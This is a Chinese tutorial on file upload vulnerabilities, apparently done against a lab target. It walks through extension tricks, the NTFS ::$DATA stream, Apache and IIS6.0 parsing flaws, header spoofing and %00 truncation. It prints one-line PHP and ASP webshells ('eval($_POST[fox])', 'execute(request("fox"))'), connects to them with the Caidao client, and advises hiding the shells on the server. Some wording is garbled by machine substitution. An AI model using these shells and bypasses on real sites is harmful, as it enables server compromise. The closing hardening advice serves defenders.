1.PHP345文件绕过上传
PHP3代表PHP版本3,这里用于文件绕过检测。一样平常的软件都是向下兼容,PHP3代码,PHP5同样兼容能够实行。如下图所示,fox.php5文件同样能够正常上传。
2.Windows ::$DATA绕过
Windows ::$DATA绕过只能用于Windows,Windows下NTFS文件系统有一个特性,即NTFS文件系统在存储数据流的一个属性DATA时,是要求a.php本身的数据。如果a.php还包含了其他的数据流,比如a.php:lake2.php,要求a.php:lake2.php::$DATA,则是要求a.php中的流数据lake2.php的流数据内容。大略来说,便是在数据后面加上::$DATA实现绕过,fox.php::$DATA返回fox.php数据。
上传成功如下图所示,然后可以直接访问upload/fox.php文件。
3.Apache解析漏洞上传
Apache是从右到左判断解析,如果为不可识别解析,就再往左判断。比如1.php.xxx对Apache来说xxx是不可解析的,以是就会解析成1.php,这便是该漏洞的实现事理。
如上图所示,将本地“fox.php”修正为“fox.php.xxx”,然后点击上传。
接着考试测验用菜刀去连接。URL为靶场的网址:http://192.168.1.8/file_upload/upload/fox.php.xxx,密码为PHP一句话木马中的“fox”,代码如下:
<?php eval($_POST[fox]); ?>
下图是Caidao连接的示意图。
连接之后,成功获取文件目录,可以看到“fox.php.xxx”被成功上传。
二.内容验证文件上传
内容检讨是网站安全的主要手段之一。假设我们将包含一句话木马的“fox.php”修正为“1.jpg”并上传,有的网址会提示上传缺点,由于JPG格式不能实行PHP文件脚本的。
<?php eval($_POST[fox]); ?>
如下图所示,它会判断图片的文件头,包括gif、png、jpg等格式。
文件头是用来判断数据格式的,这里考试测验修正文件头进行上传,以gif文件为例,添加文件头“GIF89a”后即可上传成功。
同样可以考试测验BurpSuite抓包修正文件后缀.php进行上传。
三.%00截断上传
0x00是十六进制表示方法,是ASCII码为0的字符,在有些函数处理时,会把这个字符当做结束符。这个可以用在对文件类型名的绕过上。须要把稳,00截断get是可以自动转换的,post须要分外转换,下面举一个例子。
首先,选择上传一张包含一句话木马的“php.jpg”图片。
然后,利用BurpSuite抓包并修正后缀名为“php.php%001.jpg”。如果直接修正为“php.php”可能会被过滤。
这种方法仍旧不可行,由于它采取post提交数据,须要分外转换。这里选中“%00”右键转换为URL格式,如下图所示,然后再点击“Forward”提交数据即可。
文件成功上传,%00自动截断后面的内容。
四.IIS6.0 解析漏洞
ISS6.0解析漏洞分两种:
1.目录解析
以“.asp”命名的文件夹里的文件都将会被当成ASP文件实行,比如“1.asp/1.jpg”,这里1.jpg会被当做asp文件实行。
利用IIS6.0解析漏洞,我们可以在网站下建立名字为“.asp” 、“.asa”的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析。例如创建目录“vidun.asp”,则“/vidun.asp/1.jpg”将被当作asp文件来实行。
2.文件解析
“.asp;.jpg”像这种畸形文件名在 “;” 后面的直接被忽略,也便是说当成 “.asp”文件实行。比如“1.asp;1.jpg”命名的文件,同样因此asp脚本进行实行。IIS6.0 默认的可实行文件除了asp还包含这三种:.asa、.cer、.cdx。
网站上传图片的时候,将网页木马文件的名字改成“.asp;.jpg”,分号后面的不被解析也同样会被IIS当作asp文件来解析并实行。例如上传一个图片文件,名字叫“vidun.asp;.jpg”的木马文件,该文件可以被当作asp文件解析并实行。
假设某网站是用IIS6.0搭建。
该ASP靶场存在一个图片上传的后台页面,如下图所示:
第一步,我们制作一个名为“asp1.jpg”的一句话木马,核心代码如下:
<%execute(request("fox"))%>
第二步,考试测验上传“asp1.jpg”图片,它会提示上传类型禁绝确。
第三步,由于该网站检讨了文件头类型,这里须要进行大略的修正,比如增加GIF文件头。
第四步,选择上传,此时能够成功上传。
第五步,接着考试测验BurpSuite进行抓包,这里截取到数据包,点击“Send to Repeater”按钮。
第六步,考试测验在左边“upfile/”文件路径名后面增加文件名称“1.asp;”,然后点击要求发送。右边会显示文件成功上传,其路径详见图中。
上传之后的文件可以成功访问,如下图所示。
第七步,考试测验进行Caidao连接,输入地址和密码“fox”。
第八步,成功获取做事器的文件目录,如下图所示。
把稳:IIS6.0解析漏洞被创造的时候,微软是不承认这个漏洞的,以是没有进行相应的补丁修补。基本IIS6.0网站都很存在该漏洞。
同样的方法,某些TXT文件也是可以利用该漏洞进行上传。基本流程如下:
先随意上传一个文件,不雅观其url创造是asp脚本布局的页面
在本地制作一个asp的一句话木马保存到文件中,然后打开burpsuite的代理功能去进行抓包修正
发送的POST要求中创造刚发送的asp.txt被保存的第二个upload文件下,为了让其实行,我们在第二个upload后面加入/webshell.asp文件
通过上一个步骤,有效地将asp.txt这个一句话木马放入webshell.asp中,IIS利用解析漏洞将asp.txt当作asp脚本去实行
在burp中转发浏览器显示成功上传,并列出上传的地址。末了通过Caidao远程连接获取目录。
另一种方法,将刚刚的asp木马文件名修正为webshell.asp;.txt,由于该网站不许可上传以asp作为后缀的文件名,以是我们利用.txt后缀,但分号后面的内容将会被IIS过滤不去解析,以是这便是个asp脚本。
通过Caidao成功获取目录如下图所示,建议只管即便放置在隐蔽位置;同时某些网站有上传大小限定,可以考试测验在一句话木马文件中添补内容。
如果您是一名网站管理员,您须要把稳:
(1) 进行文件黑名单和白名单过滤是非常必要的。
(2) 文件的完全性校验、文件头校验、文件格式校验、文件大小校验都是必要的。
(3) 避免像IIS6.0解析漏洞,把稳干系CVE漏洞提示并及时修复。
(4) 如果可以,考试测验对上传文件的内容进行大略的校验。
(5) 网站防火墙、安全狗都须要安装,弱口令、SQL注入、XSS等常见漏洞须要预防。
五.总结写道这里,这篇根本性文章就此结束,后面会连续分享文件上传漏洞。末了希望根本性文章对您有所帮助,作者也是这个领域的菜鸟一枚,希望与您共同进步,共勉。上周末女神来了一趟,哈哈。这周举办会议,非常劳碌,但也挤些很少的韶光分享新知识,且看且珍惜。
